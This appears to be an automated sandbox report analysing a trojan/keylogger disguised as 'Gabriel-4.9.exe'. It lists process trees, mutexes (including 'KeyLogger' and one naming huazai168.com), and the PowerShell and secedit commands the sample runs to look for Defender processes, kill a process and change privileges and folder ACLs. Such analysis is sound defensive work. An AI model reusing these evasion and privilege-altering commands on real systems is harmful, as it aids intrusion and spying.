Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003029C	2_2_000000018003029C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002A29C	2_2_000000018002A29C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180023AF0	2_2_0000000180023AF0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800352F8	2_2_00000001800352F8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180031328	2_2_0000000180031328
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001F34C	2_2_000000018001F34C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003E354	2_2_000000018003E354
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180021B88	2_2_0000000180021B88
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800223CC	2_2_00000001800223CC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180026BD4	2_2_0000000180026BD4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180022BE8	2_2_0000000180022BE8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001EBFC	2_2_000000018001EBFC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180020C38	2_2_0000000180020C38
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180034C50	2_2_0000000180034C50
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001E454	2_2_000000018001E454
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002649C	2_2_000000018002649C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800214A8	2_2_00000001800214A8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001F520	2_2_000000018001F520
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001ED40	2_2_000000018001ED40
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003CD74	2_2_000000018003CD74
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002759C	2_2_000000018002759C
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180008DC0	2_2_0000000180008DC0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800215C4	2_2_00000001800215C4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180037DC8	2_2_0000000180037DC8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800205D8	2_2_00000001800205D8
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002A600	2_2_000000018002A600
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180032638	2_2_0000000180032638
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180028E38	2_2_0000000180028E38
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180035694	2_2_0000000180035694
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180027EB0	2_2_0000000180027EB0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002D6C0	2_2_000000018002D6C0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180026EEC	2_2_0000000180026EEC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003D774	2_2_000000018003D774
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800347B0	2_2_00000001800347B0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180039FD4	2_2_0000000180039FD4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001FFE0	2_2_000000018001FFE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD341F82B2	12_2_00007FFD341F82B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD341F7506	12_2_00007FFD341F7506
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD341F5515	12_2_00007FFD341F5515
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD341F3923	12_2_00007FFD341F3923
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD341F57FA	12_2_00007FFD341F57FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD341F25ED	12_2_00007FFD341F25ED
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_00359664	30_2_00359664
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0629F69A	30_2_0629F69A
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0629AEE0	30_2_0629AEE0
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_062A2A81	30_2_062A2A81
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_062AA03E	30_2_062AA03E
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0625FC59	30_2_0625FC59
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0625B49F	30_2_0625B49F
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_06263040	30_2_06263040

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 0625A403 appears 94 times
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 06299E44 appears 95 times
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 0629A41B appears 46 times
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 0625A9DA appears 42 times
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: String function: 00000001800120F0 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: String function: 0000000180002960 appears 55 times

Source: Gabriel-4.9.exe

Static PE information: invalid certificate

Source: Gabriel-4.9.exe	Binary or memory string: OriginalFilename vs Gabriel-4.9.exe
Source: Gabriel-4.9.exe, 00000000.00000003.2089512069.00000000024D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Gabriel-4.9.exe
Source: Gabriel-4.9.exe, 00000000.00000003.2089512069.00000000024D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \StringFileInfo\%04x%04x\OriginalFilename vs Gabriel-4.9.exe
Source: Gabriel-4.9.exe, 00000000.00000003.2089512069.00000000024D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SpecialBuildPrivateBuildOriginalFilenameLegalTrademarksLegalCopyrightProductNameInternalNameFileDescriptionCompanyNameProductVersionFileVersion\StringFileInfo\%04x%04x\SpecialBuild\StringFileInfo\%04x%04x\OriginalFilename\StringFileInfo\%04x%04x\Comments\StringFileInfo\%04x%04x\LegalTrademarks\StringFileInfo\%04x%04x\LegalCopyright\StringFileInfo\%04x%04x\ProductName\StringFileInfo\%04x%04x\InternalName\StringFileInfo\%04x%04x\FileDescription\StringFileInfo\%04x%04x\CompanyName" vs Gabriel-4.9.exe
Source: Gabriel-4.9.exe, 00000000.00000003.2089512069.00000000024D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesuf_rt.exeL vs Gabriel-4.9.exe
Source: Gabriel-4.9.exe, 00000000.00000002.2228883613.00007FF74650F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename360DeskAna.exe0 vs Gabriel-4.9.exe
Source: Gabriel-4.9.exe, 00000000.00000003.2088947118.0000000002071000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename360DeskAna.exe0 vs Gabriel-4.9.exe

Source: Process Memory Space: powershell.exe PID: 3472, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: MTGHu7b.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9947265625
Source: MTGHu7b.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9991230867346939
Source: MTGHu7b.exe.2.dr	Static PE information: Section: ZLIB complexity 0.99609375
Source: MTGHu7b.exe.2.dr	Static PE information: Section: ZLIB complexity 0.994498996559633
Source: MTGHu7b.exe.2.dr	Static PE information: Section: ZLIB complexity 0.990234375
Source: iusb3mon.exe.18.dr	Static PE information: Section: ZLIB complexity 0.9947265625
Source: iusb3mon.exe.18.dr	Static PE information: Section: ZLIB complexity 0.9991230867346939
Source: iusb3mon.exe.18.dr	Static PE information: Section: ZLIB complexity 0.99609375
Source: iusb3mon.exe.18.dr	Static PE information: Section: ZLIB complexity 0.994498996559633
Source: iusb3mon.exe.18.dr	Static PE information: Section: ZLIB complexity 0.990234375

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@244/105@2/3

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Code function: 2_2_0000000180010AB0 GetLastError,FormatMessageA,

2_2_0000000180010AB0

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

Code function: 0_2_00007FF7465019B4 GetCurrentDirectoryA,GetTempPathA,lstrlenA,lstrcpyA,lstrlenA,lstrcatA,wsprintfA,wsprintfA,DeleteFileA,RemoveDirectoryA,GetFileAttributesA,CreateDirectoryA,lstrcpyA,SetCurrentDirectoryA,lstrcpyA,CreateDirectoryA,SetCurrentDirectoryA,lstrcpyA,lstrlenA,lstrcatA,lstrcpyA,lstrcpyA,lstrcatA,lstrcpyA,lstrcatA,GetDiskFreeSpaceA,lstrcpyA,SetCurrentDirectoryA,

0_2_00007FF7465019B4

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: GetModuleFileNameA,wsprintfA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlenA,RegSetValueExA,

30_2_06296D6C

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_06295CE6 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

30_2_06295CE6

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_00342170 Sleep,CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,SysFreeString,CoUninitialize,CoUninitialize,SysFreeString,SysAllocString,VariantInit,VariantInit,VariantInit,SysFreeString,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,_com_issue_error,MessageBoxA,

30_2_00342170

Source: C:\ProgramData\Program\iusb3mon.exe

30_2_062967CC

Source: C:\ProgramData\Program\iusb3mon.exe

30_2_062967CC

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

File created: C:\Program Files\product1\

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

File created: C:\Users\Public\Documents\UfHE8OB\

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1032:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Mutant created: \Sessions\1\BaseNamedObjects\huazai168.com:25445:
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1616:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2728:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Mutant created: \Sessions\1\BaseNamedObjects\KeyLogger
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0

Jump to behavior

Source: Gabriel-4.9.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select ParentProcessId from Win32_Process where ProcessId=3220
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select ParentProcessId from Win32_Process where ProcessId=3220

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: Gabriel-4.9.exe	Virustotal: Detection: 11%
Source: Gabriel-4.9.exe	ReversingLabs: Detection: 13%

Source: iusb3mon.exe	String found in binary or memory: lable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdl
Source: iusb3mon.exe	String found in binary or memory: lable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdl
Source: iusb3mon.exe	String found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAva
Source: iusb3mon.exe	String found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAva

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

File read: C:\Users\user\Desktop\Gabriel-4.9.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Gabriel-4.9.exe "C:\Users\user\Desktop\Gabriel-4.9.exe"
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5572466 "__IRAFN:C:\Users\user\Desktop\Gabriel-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=3220').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
